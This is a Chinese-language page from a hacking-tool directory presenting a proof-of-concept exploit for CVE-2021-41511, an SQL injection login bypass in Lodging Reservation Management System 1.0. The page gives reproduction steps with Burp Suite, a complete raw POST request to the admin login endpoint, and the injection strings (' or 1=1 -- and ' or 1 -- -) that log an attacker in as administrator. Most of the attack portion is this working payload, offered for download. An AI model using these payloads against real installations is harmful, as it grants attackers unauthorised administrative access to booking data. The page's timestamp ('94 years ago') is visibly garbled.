Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-41511 — 针对 Lodging Reservation Management System 1.0 中 SQL 注入和认证绕过的概念验证利用,可通过特制载荷实现未授权管理员访问。 | Kitploit
工具/GitHubGitHub/vidvansh/cve-2021-41511
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubvidvansh/cve-2021-41511

CVE-2021-41511

针对 Lodging Reservation Management System 1.0 中 SQL 注入和认证绕过的概念验证利用,可通过特制载荷实现未授权管理员访问。

查看仓库
94年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-41511

漏洞标题: 住宿预订管理系统 1.0 - SQL注入/认证绕过

漏洞作者: Nitin Sharma(vidvansh)

厂商主页: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html

软件链接: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code

版本: v1.0

测试环境: Windows 10 - XAMPP Server

描述: 密码输入因不当的净化处理而产生认证绕过漏洞,导致可访问未授权账户。

#复现步骤: 步骤 1 访问产品管理员面板 http://localhost/lodge/admin/login.php。 步骤 2 – 在用户名和密码中输入任意内容 步骤 3 – 点击登录,并使用 Burp Suite 捕获请求 步骤 4 – 将用户名改为 ' OR 1 -- - ,密码改为 ' OR 1 -- -。 步骤 5 – 点击 Forward,现在你将作为管理员登录。

PoC:

POST /lodge/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/lodge/admin/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin

username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+

认证绕过:

前往管理员登录页面 (http://localhost/lodge/admin/login.php),然后使用以下载荷作为用户名和密码 =>

用户名: ' or 1 -- - 密码: ' or 1 -- -

下载工具